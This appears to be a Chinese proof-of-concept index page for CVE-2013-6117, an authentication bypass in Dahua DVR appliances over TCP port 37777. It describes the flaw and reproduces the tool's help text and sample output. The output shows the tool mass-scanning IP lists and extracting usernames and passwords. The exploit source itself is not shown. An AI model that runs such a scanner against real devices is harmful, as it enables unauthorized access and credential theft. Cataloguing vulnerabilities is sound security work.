POC详情: 24bd0fce5c1098f7676b81cb3ad794da0ab381a8

来源
https://github.com/milo2012/CVE-2013-6117
关联漏洞
标题: Dahua Security DVR Appliances 身份验证绕过漏洞 (CVE-2013-6117)
描述:Dahua DVR是中国大华(Dahua)公司的硬盘录像机产品。 Dahua DVR 2.608.0000.0和2.608.GV00.0版本中存在安全漏洞。远程攻击者可通过向TCP 37777端口发送请求利用该漏洞绕过身份验证,获取敏感信息,更改用户密码,清除日志文件,执行其他恶意操作。
描述
CVE-2013-6117
介绍
**CVE-2013-6117**
   
```
$ ./CVE-2013-6117 -h
Options:

  -h, --help       display help information
  -f, --filename   File containing list of IP addresses
  -t, --target     Target IP
  -n, --threads    No of concurrent threads (default: 100)
```
   
```
$ ./CVE-2013-6117 -f hostfile.txt 
1.2.4.4|name.no-ip.org:80|username|password
```
  
```
$ ./CVE-2013-6117 -t 1.2.3.4
1.2.4.4|name.no-ip.org:80|username|password
```
  
Reference:  
https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117  
https://www.exploit-db.com/exploits/29673/
文件快照

 [4.0K]  /data/pocs/24bd0fce5c1098f7676b81cb3ad794da0ab381a8
├── [3.5K]  CVE-2013-6117.go
├── [ 212]  goreleaser.yml
└── [ 564]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。